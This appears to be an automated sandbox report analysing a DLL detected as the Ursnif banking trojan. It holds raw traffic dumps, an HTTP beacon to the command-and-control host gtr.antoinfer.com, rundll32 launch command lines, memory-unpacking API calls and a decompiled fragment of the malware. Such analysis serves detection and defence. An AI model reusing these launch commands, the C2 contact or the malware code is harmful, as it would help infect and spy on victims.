c2 63 de 98 96 33 63 34 1c 41 7e a8 a2 9a 3b 53 6e 3f ec f7 cb 52 5e 28 d9 cd c2 fb d7 00 1b ab 5a 0e 4b ef 7f dc 23 bb 10 58 0e 6d 91 bc 10 8c a6 f3 24 68 05 82 8d 9c 07 fa Data Ascii: 2000@E?^A;){I6}.+~1%c4LFmy.8}9tt@X3%C&\P#f(zucK^p\| cs%uwJ>J+_6.7W%Y!ud[OZ3#2"v()+CLW5'1):5L,?jL-0mw[wvLagQ+>>OA J[ 7]/1~ArJv26\s?8&]^/p7{SKSIwDe"P8NZ':5j-w@>nPwqrXWoV7(zM#>sHnt=_{=T24[/017%f3\L9~e13~r-3`Y2,%d[_<WV^$=jwPYtWqO4NG'9_#\Dc`LJnQ8$[JAiV-X9l8)xM0KjUUB;$ec^u5/W>#WN5,lXnXgiEI2p\|!-pYX4U&\|;OZ~]N7%9-Ffm@/ !)v1dA,GSkE Nh5\^q'1ubZN\cLw4AqiX3sVU,+~F_MNY<,}z~:tLc%(p\|.^~#XdBw#L7f+7yg~X+c3c4A~;Sn?R^(ZK#Xm$h
Jul 5, 2021 16:53:18.446751118 CEST	1858	IN	Data Raw: 72 5e 22 38 89 9a b7 70 2b ab 1b 19 71 44 62 14 ec c6 9e a5 67 61 0a 39 86 d6 91 bc ab 2a 0e 86 26 5b 83 31 e6 6b be 5b eb db 4b 29 ad c1 19 56 6f 20 26 c3 26 22 89 ca 3b 7d 22 ce fb a8 cc d2 7e 1f 3a 3b 51 99 72 4d e3 40 18 79 fd 30 4d 58 ec 4c Data Ascii: r^"8p+qDbga9*&[1k[K)Vo &&";}"~:;QrM@y0MXL}vovS9B6(@#,QpjTn5&{Wor!tiC\|tqI-1>'}^sNszHS.gI!!=/`S&
Jul 5, 2021 16:53:18.446780920 CEST	1860	IN	Data Raw: 5b c5 30 f5 7b e2 11 84 d5 cb 21 14 81 fa de 8f b2 92 46 58 73 36 28 85 dd e6 7e ba f6 33 4a 58 8f 2a b6 f4 d9 d8 e6 07 85 ae 9c 81 74 47 c8 2b c7 04 6f 26 e4 fd 49 9f cd 4c 32 ec 77 07 a8 0d b3 3a 60 1c 61 e8 b5 57 3f 98 d8 d5 fe aa c9 a5 d5 e8 Data Ascii: [0{!FXs6(~3JX*tG+o&IL2w:`aW?)-pH5qh(\|pRN=?jOVkC$eS\L\W3Q\F,iyqS%//PA,0EZ(6)^4OP
Jul 5, 2021 16:53:18.446798086 CEST	1861	IN	Data Raw: 24 7c 16 e9 37 16 e2 f8 21 71 ca 36 8d d1 99 13 94 4a 46 e6 31 7d 4d 35 7e d1 c1 48 3c 80 38 d9 e4 59 02 cf 07 2f 3b ac 5e 08 37 25 1f a1 9a 02 f2 1c 62 39 c9 91 fb 53 d4 44 64 b9 af f9 62 01 3b 36 4b fd 8d bc 2c 13 eb 4d bb cc 0f 37 b2 88 3c 7c Data Ascii: $\|7!q6JF1}M5~H<8Y/;^7%b9SDdb;6K,M7<\|\ws@\|Gzg^&\|iJMxn_r-nXqZ'h0&,5,bDVx e@m,?\iPOq#Uun_}8w>
Jul 5, 2021 16:53:18.446809053 CEST	1862	IN	Data Raw: 3d b1 cb 72 12 b4 49 2b 34 0a 11 78 8e 99 5b ad b6 e6 e9 34 87 c3 8e 44 b8 ef be 69 4d 5a b9 1b 3e 5f 9d aa a7 6a 11 71 56 f1 cd 90 19 b9 be 08 e2 9a 6d b2 b8 c5 2a f0 2e 05 50 06 6d 17 be b8 f7 fd 48 c3 c5 fc 8b 95 07 8a e5 fe 4a 16 b8 67 8d f2 Data Ascii: =rI+4x[4DiMZ>_jqVm*.PmHJgQ>,gIC.a4\|c?c-v R[\Os!<Y}f#o(@'-)QKGdVSH?Q30XsVEhX5P5oz
Jul 5, 2021 16:53:18.446820974 CEST	1864	IN	Data Raw: 9f 92 b8 ec 92 f8 37 45 12 03 97 08 cc b1 4d 3a df cf 57 e6 b5 8e 42 5c 35 25 91 35 6e 90 67 90 4f 29 31 c0 c3 f2 b3 da 6a 21 5c 25 63 20 2c be 6f 7d 3a 1c 45 83 47 35 35 46 d8 bc 09 62 03 c6 e3 f1 ec 0f f5 34 cc 48 69 f0 52 7e 26 6f 52 7d e0 a1 Data Ascii: 7EM:WB\5%5ngO)1j!\%c ,o}:EG55Fb4HiR~&oR}r/~pnIg{wE3b)?~fLZ%'F~b\|uNrP!cr4<>9p{s`]CHO*;#JW0~</-V7T91
Jul 5, 2021 16:53:18.448369980 CEST	1865	IN	Data Raw: b7 b9 39 3b 16 00 9d 6f b1 6f 95 3f fb 64 52 2e 01 d2 b2 71 f4 2d 9d 73 5c 5d 39 28 66 61 3b 30 13 c4 c6 8c 11 bc 8f 82 bb 8e 84 19 dd 34 82 7c 48 b7 e4 16 6b d5 1b 7d 1b f0 0d d8 34 4e 68 5f 08 a2 fc 8b 10 e8 1b 00 ad e9 b7 3a 93 e0 e9 8c cb 6e Data Ascii: 9;oo?dR.q-s\]9(fa;04\|Hk}4Nh_:n.BG/Ca=)Y?(lC.~^4dk"+;*H,W.E^d\|#_I@S'q='B!J.=H8
Jul 5, 2021 16:53:18.448400974 CEST	1867	IN	Data Raw: f2 e4 a8 e5 e9 69 d4 eb 48 5c 5e 03 59 ff fc c8 48 d9 86 44 21 8a d9 b2 b0 cb 64 69 82 a9 ed 1f f9 a3 b0 1d 6e 87 c5 02 62 86 aa e5 0d e1 cf 3e 95 2e 5a 8d 7f ab 7f 0c 2f 03 95 bf bb d5 19 01 fb 27 c3 a1 22 9b d4 04 ad ec 07 ee c3 0a 3a a8 b7 63 Data Ascii: iH\^YHD!dinb>.Z/'":c.-];8DS{8Q$<V&4`G@RgKQ``C#s{gf@\|P0br[j,TuXdDOPsMhY5/G<<5u
Jul 5, 2021 16:53:18.448424101 CEST	1868	IN	Data Raw: 7b 74 2e cc 3e ec 1a 90 9f 8d 7d 54 cf ef 81 2f 2a df 73 d7 67 3a 4b b8 f3 11 04 1f 31 d1 f7 10 b3 9a a3 1c 73 86 63 45 3b 81 0d 4d 85 fc ed 01 6c c5 8a 29 d1 e0 b1 12 b3 64 ff c7 44 a9 76 9a d8 17 16 f6 44 23 e5 d2 d1 31 57 e7 6e a0 fd 89 c6 ce Data Ascii: {t.>}T/*sg:K1scE;Ml)dDvD#1Wn_udC/.2upA7As2'C.lWCYO.M-xG:?2\|`+qKw#Bsu,}& ycWb?].8<-W3<
Jul 5, 2021 16:53:18.448440075 CEST	1869	IN	Data Raw: 98 bf fc 40 4e d9 6d 0c 5b aa 3d cd 83 c7 dd 80 e2 fd d6 32 b8 cd d2 43 54 26 3b cf dc 00 ca 43 9c 11 ad 40 72 bb ba c5 ea dc fb 74 14 91 31 64 cb 36 ed b8 09 fb 4f 9b b7 26 26 9e 2f 0a 7f e5 1e c9 30 b8 c5 65 4a 7e 69 d5 8e b1 82 be 03 8e fa e1 Data Ascii: @Nm[=2CT&;C@rt1d6O&&/0eJ~iCR(~O)U{ZkS7>7;;nq'37.Ly?~A[CRah<b\|L0JxNEOO,7nbARiRD
Jul 5, 2021 16:53:18.636971951 CEST	1871	IN	Data Raw: d0 39 c5 92 23 49 7a ae 4d 06 df 88 0b e2 3c 7b 50 fb 04 f8 88 98 9d 5e 97 29 24 7e 9a b1 8b 02 d0 8a b7 35 1a 0b d3 0c d5 fc 96 41 a0 37 ba 35 82 1a ad b8 cd 1a 23 0c d0 b0 b8 61 95 37 1b fc 29 9e 99 f9 cc af f9 0c bb 76 4e bc 26 16 63 24 23 34 Data Ascii: 9#IzM<{P^)$~5A75#a7)vN&c$#4]WXD\3X:>S PEC1#'eXS]6'ob, (Ecu0U`(2]d^]qt(GL`$ll7R%-$9TiQfDc~1{]]d\|4rnF

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49736	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2021 16:53:21.708478928 CEST	2118	OUT	GET /J7P_2BuFqD/6ho97HFr4RP0mXM5H/ZrJ1_2BByY5Q/ab42fK_2F4S/vR5_2FWZ9gdHVf/hFgLjlRclm4jOH5T1Dh_2/Bb6OfmnpAwg0WKei/TGgUW067tNixzOx/BwPRLezaId9OtwPQlY/CkLoMrcdP/aOG78DSC7_2BjhPI9iFK/iN8ZMV2kpmYpR22nO5N/DPr4nIGLY40kIrg97zu5zK/lZpfj5ONzqtKf/Vl33ZktQ/u9goArPbUAC5CGM3eIqnvuS/s_2BLl3UAj/4ev_2F316DIi43v_2/FeCwH6Boab2B/JVucmKuDRDu/1ldPV7QmrKfn1O/3tEgr34mvlOov5etr8LcR/vS5_2Fy HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 5, 2021 16:53:22.659883976 CEST	2120	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 05 Jul 2021 14:53:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 45 b2 84 50 14 43 17 d4 03 78 0d 34 30 c4 dd 9d 19 ee ee ac fe ff 05 a4 92 ba 75 73 e2 a8 0d 14 9a 45 0d 8e 9f 70 7a 38 ed b8 b1 06 00 e4 b8 06 b5 5b 85 ea 9e 74 66 0d f4 36 0e 9b 43 34 49 3b 37 ab 4d cd be f9 85 51 4e e3 5d 78 b3 ae 2f a8 19 ef b0 48 56 f7 2e 41 4d 53 40 a0 bb ed e8 7e 93 93 57 ba 32 90 d5 e9 82 48 54 53 a7 bb ae cf 2a 5c 0c bf e2 d0 6c ee 63 10 b2 4d d8 c4 75 39 7d f5 a8 04 16 b9 5d 67 c0 96 5a 09 94 b4 72 e2 26 37 fc a4 a2 c9 54 84 e2 7a 2e 36 e1 9d 9b 1b 59 e9 11 64 a5 ba 75 73 08 7a 4b 0c 4d 58 9d 2b 90 06 98 ca 55 05 b5 db 96 bf 7d 47 e2 29 51 10 49 0b bc f0 3c 60 cd ef 62 79 4b d6 d1 11 9a c6 a9 f8 a0 13 2a ff 08 3d 26 cd a2 09 d6 5a 6a 1a 18 55 6a d7 7f 48 5b a2 18 fd 4d e9 bc 97 19 ad a2 f8 51 53 76 0b c2 9c ea ce 7b 62 94 ad b8 0c dc 96 ca 07 98 52 e5 eb a7 ff 3b 8c b3 61 7d 1f c9 c5 21 db 62 d4 24 9f 2c 47 0c 7b 5e 91 c8 03 f0 8c ab d8 98 af e8 79 eb b6 fa 6a e3 42 a1 59 f1 d9 de 1d ac d6 4b fc 3a e5 01 f5 c1 d3 e2 bd c9 d3 b6 d8 32 6b 2a c7 63 f5 79 4c ac 2e c7 fa 76 b1 9b f7 05 59 0d 10 51 f0 b7 c4 fb ac 13 a2 94 06 82 a9 c4 e1 29 5b 20 50 ea a4 f8 1f 85 72 a8 b8 6d f7 12 6a 49 93 07 51 5b 4d 15 9d fb 0e 7c 7c 4b 2c d5 da 28 c5 3b ea b7 05 77 9a 6b 39 a2 fd 7e 4a 0f 63 e4 da b6 a9 a2 7d 2f 30 d4 66 d5 bb 92 98 b2 61 bc 7e e1 68 c8 b3 39 71 e8 f2 c9 d9 2d cc fa 04 cd bd c0 7f 9a cd e4 bd 8e 5d f6 79 7d a9 e3 e9 ba 06 2e a0 e7 4e 21 21 7d a0 57 47 fb 3a 91 c3 a8 36 8a 15 d6 bd d5 f8 3f 4c 60 3c 13 cc 55 bb 31 0f f3 20 5b 0d 7e 3a bb 34 1e 39 2f 36 ef 0e 7a f9 81 65 1d 7d b0 44 24 47 08 d0 ff 11 b6 09 a6 ef 82 d1 c3 48 d1 48 dc 88 b9 85 b3 6a b3 d7 fd 0f 7e ed 1b be 08 29 8c 26 14 26 f0 27 88 82 f8 37 32 db 47 e0 bc 15 cf 31 e9 d7 ec e6 16 15 7e 38 e7 37 d9 48 00 cd 92 56 da 53 a8 41 c1 e4 60 f1 e1 ab a4 a4 b4 d7 14 a8 ae 1a 9c f8 bd 08 b8 d9 be 88 63 76 d5 f9 50 5e b5 6c 5e 55 51 a8 ce 14 f2 c7 b3 5e 13 37 f9 c7 5f b1 50 f2 ce da dd bf b4 b3 c6 f8 9b a2 12 2b 29 ea 5b db fa ec a7 5b a0 b9 9e d6 04 9f e5 a2 28 b1 09 fb 51 e3 69 c6 a9 64 05 6a 88 a0 db 8e 57 65 15 be 78 95 d6 fa a6 e8 e8 18 30 7d ca 4e 44 99 22 ea 72 ca 1e c4 27 9b ee 63 22 4d b4 28 52 eb 9e dc 90 d6 26 8e cc 6e cd ab ae ad ba 6e 81 6f be 8d d8 23 6c 1a 22 b0 90 1b bc 17 d2 b9 f8 f4 0c e8 8f 2f b9 f9 4d 82 74 ac 75 53 79 14 23 91 98 0c d7 85 de 3f 9d 8e 65 20 3c 9f e4 52 7d 78 d0 b9 da 9e 1a a4 4c 26 ac 86 a3 0b 9e 1c 7d 49 05 c5 e1 5d 6a 63 26 81 5e 85 6f 28 43 0f 99 db 3e b5 0c c4 ff 0f 32 7c 26 fb 07 ac 42 7c 72 c5 b1 1e 95 13 8e 64 07 ec da 82 c3 16 27 e1 53 27 9c 5a b8 0b 49 53 cb 87 42 cc cc d3 9e e8 23 0b cd b8 87 55 a7 87 4e fb ef 3c fb 5f 78 4d 09 82 1c 84 48 4c ac 33 3b ad e7 ff 96 51 97 0f a3 da cb fc ca 32 b5 4c 39 dd b8 86 19 04 93 af 04 18 2a ce d9 f7 b2 34 fd 08 0f 4c cc e6 ce a6 3e af 45 38 f6 d2 7d 59 20 9d 0e 71 ef 68 da 3c ee 58 64 e4 b8 df f9 90 de 42 e0 53 4f 87 73 ae a3 d8 31 ab f5 76 90 5a 5c a0 87 54 bc 88 cc 95 59 6d 72 76 6e 06 6c b2 45 f3 9f ea 2c a8 48 5c 36 b3 8f 3b f4 41 b4 39 c6 a7 5d 91 77 6b 5f 7f 30 a9 9b d4 f0 51 12 87 9d 09 69 27 1f e4 6d 56 04 4d 68 24 71 c5 b5 93 36 a9 14 Data Ascii: 767EPCx40usEpz8[tf6C4I;7MQN]x/HV.AMS@~W2HTS\lcMu9}]gZr&7Tz.6YduszKMX+U}G)QI<`byK=&ZjUjH[MQSv{bR;a}!b$,G{^yjBYK:2kcyL.vYQ)[ PrmjIQ[M\|\|K,(;wk9~Jc}/0fa~h9q-]y}.N!!}WG:6?L`<U1 [~:49/6ze}D$GHHj~)&&'72G1~87HVSA`cvP^l^UQ^7_P+)[[(QidjWex0}ND"r'c"M(R&nno#l"/MtuSy#?e <R}xL&}I]jc&^o(C>2\|&B\|rd'S'ZISB#UN<_xMHL3;Q2L94L>E8}Y qh<XdBSOs1vZ\TYmrvnlE,H\6;A9]wk_0Qi'mVMh$q6
Jul 5, 2021 16:53:22.659929991 CEST	2121	IN	Data Raw: f2 6b cf 90 24 22 db 80 7c f0 38 f7 84 b2 a7 28 3e e2 4e 55 3d 3a de 0c f1 eb 8d 07 87 d3 ac db 67 b0 de ff af ef 9e 98 6e 00 e8 0b 01 5e 49 d7 06 07 17 9e ab 76 1f 52 35 79 cc 83 bf 75 35 8b 52 4d bb cf 55 1a 9c f2 e0 5d 93 bd b8 bb 4b f5 3e 2f Data Ascii: k$"\|8(>NU=:gn^IvR5yu5RMU]K>/BufN~^GL#},pPJ"EC!p]M=k7l2Ku[}eR\|]\|W\9(Y6x\%>kY'e<u/$+1:p8qn

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4876 Parent PID: 5744

General

Start time:	16:51:07
Start date:	05/07/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\3b17.dll'
Imagebase:	0xa80000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 3868 Parent PID: 4876

General

Start time:	16:51:07
Start date:	05/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 244 Parent PID: 4876

General

Start time:	16:51:08
Start date:	05/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing
Imagebase:	0x1340000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4576 Parent PID: 3868

General

Start time:	16:51:08
Start date:	05/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Imagebase:	0x1340000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5928 Parent PID: 4876

General

Start time:	16:51:12
Start date:	05/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce
Imagebase:	0x1340000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3012 Parent PID: 4876

General

Start time:	16:51:16
Start date:	05/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose
Imagebase:	0x1340000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5912 Parent PID: 4876

General

Start time:	16:51:21
Start date:	05/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\3b17.dll,Time
Imagebase:	0x1340000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3472 Parent PID: 792

General

Start time:	16:53:04
Start date:	05/07/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff763ec0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4792 Parent PID: 3472

General

Start time:	16:53:06
Start date:	05/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2
Imagebase:	0xe30000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2996 Parent PID: 3472

General

Start time:	16:53:08
Start date:	05/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2
Imagebase:	0xe30000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 4876 Parent PID: 5744 loaddll32.exeCOMMON

Executed Functions

Function 6E21E801, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000995,00003000,00000040,00000995,6E21E250), ref: 6E21E8BE
VirtualAlloc.KERNEL32(00000000,0000006C,00003000,00000040,6E21E2B3), ref: 6E21E8F5
VirtualAlloc.KERNEL32(00000000,0000E3F3,00003000,00000040), ref: 6E21E955
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E21E98B
VirtualProtect.KERNEL32(6E190000,00000000,00000004,6E21E7E0), ref: 6E21EA90
VirtualProtect.KERNEL32(6E190000,00001000,00000004,6E21E7E0), ref: 6E21EAB7
VirtualProtect.KERNEL32(00000000,?,00000002,6E21E7E0), ref: 6E21EB84
VirtualProtect.KERNEL32(00000000,?,00000002,6E21E7E0,?), ref: 6E21EBDA
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E21EBF6

Memory Dump Source

Source File: 00000000.00000002.476398807.000000006E21E000.00000040.00020000.sdmp, Offset: 6E21E000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: c0946dfdec6311ad968fb05df371b2da3969ec27e83de0aba38451b992102b3d
Instruction ID: d570e779a3d3aa566727af6405cb063cd0a42490eee5937a6ff39ab6ffc0e1b2
Opcode Fuzzy Hash: c0946dfdec6311ad968fb05df371b2da3969ec27e83de0aba38451b992102b3d
Instruction Fuzzy Hash: 93D19F765041069FDB66CF44CCA0F9277A6FF48312B190194ED0A9FBFAD770A922CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6E191144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E191144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E192210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e1941d0;
				_push(_t15 + 0x6e19505e);
				_push(_t15 + 0x6e195054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E19220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e1941c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e191144
0x6e19114d
0x6e191151
0x6e191157
0x6e19115c
0x6e191161
0x6e191164
0x6e191167
0x6e19116c
0x6e19116d
0x6e191170
0x6e19117b
0x6e191182
0x6e191186
0x6e191188
0x6e191189
0x6e19118c
0x6e191191
0x6e19119b
0x6e19119d
0x6e19119d
0x6e1911b1
0x6e1911b7
0x6e1911bb
0x6e19120b
0x6e1911bd
0x6e1911c6
0x6e1911dc
0x6e1911e4
0x6e1911f6
0x6e1911fa
0x00000000
0x00000000
0x6e1911e6
0x6e1911e9
0x6e1911ee
0x6e1911f0
0x6e1911f0
0x6e1911d1
0x6e1911d3
0x6e1911fc
0x6e1911fd
0x6e1911fd
0x6e1911c6
0x6e191213

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E191151
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E191167
_snwprintf.NTDLL ref: 6E19118C
CreateFileMappingW.KERNELBASE(000000FF,6E1941C0,00000004,00000000,?,?), ref: 6E1911B1
GetLastError.KERNEL32 ref: 6E1911C8
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1911DC
GetLastError.KERNEL32 ref: 6E1911F4
CloseHandle.KERNEL32(00000000), ref: 6E1911FD
GetLastError.KERNEL32 ref: 6E191205

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 43afd807a243fd2e862c79b78c19668a93a4d2fcc920711a10e552e3d966049c
Instruction ID: 388c241e42cf5c43b26509f30328d5580a1e2ca5c7a61a262d33fe76a5bd4b9a
Opcode Fuzzy Hash: 43afd807a243fd2e862c79b78c19668a93a4d2fcc920711a10e552e3d966049c
Instruction Fuzzy Hash: DB21A1B2600108BFDB00AFE9CC88E9E7BADFB59355F224135F625E7140D6305985FB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E191B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
